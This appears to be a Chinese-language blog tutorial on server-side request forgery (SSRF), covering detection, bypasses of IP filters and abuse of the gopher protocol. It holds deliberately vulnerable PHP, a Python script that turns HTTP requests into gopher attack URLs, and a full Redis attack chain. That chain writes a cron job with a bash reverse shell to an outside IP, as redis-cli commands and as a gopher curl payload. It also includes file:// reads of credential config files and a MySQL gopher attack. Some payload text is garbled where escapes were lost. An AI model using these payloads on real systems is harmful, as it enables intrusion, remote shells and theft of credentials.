SSRF漏洞总结

2022-09-12 21:01:14 浏览数 (1)

大家好,又见面了,我是你们的朋友全栈君。

0x00 什么是SSRF?

SSRF(Server-Side Request Forgery):指目标应用存在一种漏洞,利用该漏洞攻击者可以控制目标web应用的后端程序向任意ip地址/语言发送http请求或者其他数据包

对外发起网络请求的地方都可能存在SSRF漏洞

0x01 危害和利用:

1. 可以对外网服务器所在内网进行端口扫描

2. 攻击运行在内网或本地的应用程序(比如溢出)

3. 对内网Web应用比如cms进行指纹识别,通过访问cms的一些特有默认文件实现

4. 攻击内外网的Web应用,主要是使用Get参数就可以实现的攻击(比如 Struts2漏洞利用,SQL注入等)

5. 利用File协议读取本地文件

例如:

以下后端脚本就存在ssrf漏洞,攻击者可以控制脚本向任意地址发送数据(curl不仅仅能发送http请求还支持其他协议)

代码语言:javascript复制
<?php
$url = $_GET['url'];
$hCurl = curl_init();
curl_setopt($hCurl,CURLOPT_URL,$url);
curl_setopt($hCurl,CURLOPT_HEADER,false);
curl_setopt($hCurl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($hCurl,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($hCurl,CURLOPT_FOLLOWLOCATION,true);
$ret = curl_exec($hCurl);
curl_close($hCurl);
echo $ret;
?>

通过这index.php,攻击者可以如何利用呢?

1.隐藏身份,请求外网地址

例如:index.php?url=www.baidu.com

2.探测和攻击内网中其他服务器

比如说对内网的机器进行扫描。因为php的curl不仅支持http协议,还支持其他协议,通过其他协议可以对内网进行扫描

例如:

还可以:

index.php?url=dict://192.168.2.101:80 利用自动化脚本遍历内网的ip地址,探测内网中80端口开放的机器。

index.php?url=dict://127.0.0.1:3306

来探测mysql数据库的相关版本信息(其实发送get请求也可以)

index.php?url=dict://127.0.0.1:3306

通过文件传输协议file://来请求文件内容,可以用来爬源码,爬数据库conf文件(存了数据库账号密码等的文件,这样我们就能尝试在从外部连接他的数据库)等

index.php?url=file://Applications/MAMP/htdocs/pentest/ssrf/1.txt

0x01 如何判断ssrf漏洞的存在

关键在于:判定目标网站的后端程序 是否可以被控制用于向外界发送请求

判断方法:

  1. 是否有回显
  2. 延时
  3. dns请求:利用我们手中的域名和dns服务器,让目标站点尝试向该域名发送请求,如果能发送请求,必然会先进行dns查询,将域名转化为ip,那么我们的dns服务器上就可以收到该dns查询请求。(可以利用ceye.io)
  4. 同样的思路:我们自己的主机上开放一个tcp端口(可以直接利用nc或者自己写一个服务端程序)让目标主机尝试向我们自己的主机发送请求,如果我们的tcp端口收到了连接请求,那么就证明目标主机存在ssrf漏洞。

0x02 PHP相关函数总结

1.file_get_contents()

例题:

将http响应报文写入图片存储起来

例如:有些网站的图片上传功能支持直接填写图片的url地址,那么从程序员的角度上可以猜测这种功能有两种实现方式:

第一种,直接将url入库,然后前端图片的src设置成该url即可

第二种,对url发送http请求,将图片下载下来,保存在服务器本地或者类似七牛云的对象存储空间中

显然第二种情况就存在ssrf漏洞,并且是“有回显的ssrf”

2.fsockopen()

创建一个tcp或者udp套接字,并向目标主机发送连接请求

可以用来实现发送http get请求/post请求等,因为tcp或者udp套接字,所以应用层协议的报头需要自己写。

使用案例:https://blog.csdn.net/zjsfdx/article/details/89376176

3.curl_exec()

https://www.php.net/curl_exec

最常用的是用来发送http请求(get请求,post请求等)

除此之外还支持其他应用层协议,比如常用的dict、file、ftp、sftp、gopher、telnet

curl支持的所有应用层协议:

0x04 IP限制绕过

如果ssrf漏洞限定了输入不能为ip地址的话,可以用以下方式绕过正则匹配:

1.ip地址之后加端口

2.ip地址前添加用户名 例如 http://root@127.0.0.1

3.ip地址之后添加get传参

4.短网址:使用短网址平台将url转化为短网址(短网址平台实现原理其实非常简单,就是在它的域名下提供一个路由,当你访问这个路由的时候就会向你提供的url发送get请求或者直接跳转到你提供的url)

如果curl没有开启跟随跳转选项的话,这种短网址跳转的方式就会得不到回显

5.使用子域名解析:xip.io

也就说“ip地址.xip.io” 这个域名会被 dns服务器解析为“ip地址”

将ip地址转化为其他进制:

比如说:目标主机限制了ip地址不能为127.0.0.1,那么就可以将:

127.0.0.1 -> 8进制 0177.0.0.1->16进制 0x7f.0.0.1

因为常见的ip地址为了人类友好都是点分十进制的表示方法,但是本质上在计算机中ip地址实际存储形式不过是用4个字节的内存去存4个8位的二进制,也就是4个两位的16进制

127.0.0.1 ->0x7f 00 00 01 浏览器访问:http://0x7f000001 仍然是可行的

将http://0x7f000001 转化为十进制也是可行的 http://2130706433

也就说点分十进制的表示方式 和十进制的表示都可行的

点分十进制是将32位的ip地址 8位8位的转化为10进制,所以需要点来分割

十进制是将32位的ip地址32位全部转化为10进制,所以不需要点来分割

0x05 gopher协议

gopher是一个互联网上使用的分布型的文件搜集获取网络协议

gopher协议的格式:gopher://host:port/_ 数据流

  1. 如果不指定端口,默认端口为70端口
  2. 数据流要求全部进行url编码,并且以rn换行也就说以 换行

gopher协议支持发出GET、POST请求:

可以先截获 get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议 (俗称万能协议)。

转化思路:

将get请求报文/post请求报文先进行url编码,然后将 全部替换为 即可

比如说:

该页面存在一个ssrf漏洞:

代码语言:javascript复制
<?php
$url = $_GET['url'];
$hCurl = curl_init();
echo "接收到的url为:n";
echo $url."n";
curl_setopt($hCurl,CURLOPT_URL,$url);
curl_setopt($hCurl,CURLOPT_HEADER,false);
curl_setopt($hCurl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($hCurl,CURLOPT_FOLLOWLOCATION,true);
$ret = curl_exec($hCurl);
curl_close($hCurl);
echo $ret;
?>

利用脚本:

代码语言:javascript复制
import urllib.parse
import requests


def createGopher(host, port, http_header):
    """将http应用层协议包装成gopher协议"""
    http_header = urllib.parse.quote(http_header)  # 对报文进行url编码
    http_header = http_header.replace('
', '
')  # 将所有n 替换为rn
    gopher = "gopher://%s:%d/_%s" % (host, port, http_header)
    # print("gopher协议:",gopher)
    return gopher


def get_demo():
    http_header = """GET / HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
"""
    host = "127.0.0.1"
    port = 8888
    gopher = createGopher(host, port, http_header)
    return gopher


def post_demo():
    http_header = """POST /loophole-recurrence/SSRF/post.php HTTP/1.1
Host: localhost:8888
Content-Length: 26
Content-Type: application/x-www-form-urlencoded

username=123&passwd=123123
"""
    host = "localhost"
    port = 8888
    gopher = createGopher(host, port, http_header)
    return gopher




def main():
    gopher = get_demo()
    # gopher = post_demo()
    # 因为存在ssrf漏洞的php脚本在收到请求后,会对url进行url解码,所以这里需要再编码一次,确保php的curl发送的url编码格式的gopher协议
    gopher = urllib.parse.quote(gopher)
    base_url = "http://localhost:8888/loophole-recurrence/SSRF/"
    target_url = base_url "curl.php?url=" gopher
    resp = requests.get(target_url)
    print(resp.text)


if __name__ == '__main__':
    main()

gopher对redis的利用:

redis没有密码

思路:

利用ssrf漏洞,通过gopher协议向redis发送一个请求,让redis将数据库文件保存到linux定时任务文件夹下,从而写入一个定时任务

代码语言:javascript复制
redis-cli -h $1 -p $2 set 1  "nn*/1 * * * * bash -i >& /dev/tcp/106.12.37.37/2333 0>&1nn"
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名

分、时、日、月、周 命令

*/1 * * * */bin/bash -i >& /dev/tcp/192.168.0.105/4444 0>&1

0 是标准输入的文件描述符

1 是标准输出的文件描述符

0>&1 表示将标准输入重定向到文件描述符为1的文件中,即将标准输入重定向到标准输出

/dev/tcp/xxxx/xxx 是一个特殊的文件,凡是尝试对该文件读或者写的操作,都会导致该文件发起一个socket连接

/bin/bash >& 表示将/bin/bash 的标准输出 写入到 /dev/tcp/xxxx

/dev/tcp/ip地址/端口 相当于创建了一个tcp套接字去连接IP地址:端口

这是一个反向的木马架构

正向的木马是标准的cs架构,把server放在目标主机上,打开端口。攻击者用client去连这个端口

反向的木马架构是将cs架构倒过来,把server放在自己主机上,打开端口,让目标主机用client去连

比如说:我在ip地址为192.168.0.105的主机上nc -l -p 4444 开启了一个服务端

然后我让目标主机:/bin/bash -i >& /dev/tcp/192.168.0.105/4444 0>&1

config set dir 设置数据库文件存储的位置

config set dbfilename root 设置数据库文件名为root

save 强制redis将当前数据库中的数据同步到数据库文件中

如何使用gopher协议来模拟redis-cilent 的以上操作呢?

我们需要将redis-client 发送给redis-server的报文截获下来,修改为gopher协议的格式

如何截获呢?可以使用以中间人代理,让redis-client发送报文给中间人,中间人转发给redis-server

shell.sh

代码语言:javascript复制
redis-cli -h $1 -p $2 set 1  "nn*/1 * * * * bash -i >& /dev/tcp/106.12.37.37/2333 0>&1nn"
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

比如说中间人端口为4444,启动中间人代理

socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

向中间人发送数据包,./shell.sh 127.0.0.1 4444

拦截到的报文格式:

格式转化脚本:

curl -v ‘gopher://127.0.0.1:6379/_*3 3 set 1 1 58 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 *4 3 set 3 % 0adir 16 /var/spool/cron/ *4 6 config 3 %0 aset 10 dbfilename 4 root *1 4 save%0 d *1

需要注意的是,如果要换IP和端口,前面的58也需要更改,58表示字符串长度 为58个字节,上面的EXP即是 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 ,3 51 4=58。如果想换成 42.256.24.73,那么58需要改成61,以此类推就行。

gopher对mysql的利用

背景:存在ssrf 、mysql 无密码

因为有密码时,需要计算服务器生成的挑战数:

MySQL数据库用户认证采用的是挑战/应答的方式,服务器生成该挑战数(scramble)并发送给客户端,客户端用挑战数加密密码后返回相应结果,然后服务器检查是否与预期的结果相同,从而完成用户认证的过程。

(1)对mysql 客户端和mysql服务端之间的交互报文进行抓包

mysql -h localhost -uroot -p

设置-h为本地回环,这样报文就会走Loopback对应的网卡接口

只要复制报文的16进制代码,转化为gopher格式直接发过去就行了

协议转化:

gopher://127.0.0.1:3306/_ url编码的登录请求

包长度



查询语句(url编码)



工具推荐

https://github.com/tarunkant/Gopherus

0x0 案例

http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0215779

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/152841.html原文链接:https://javaforall.cn

0 人点赞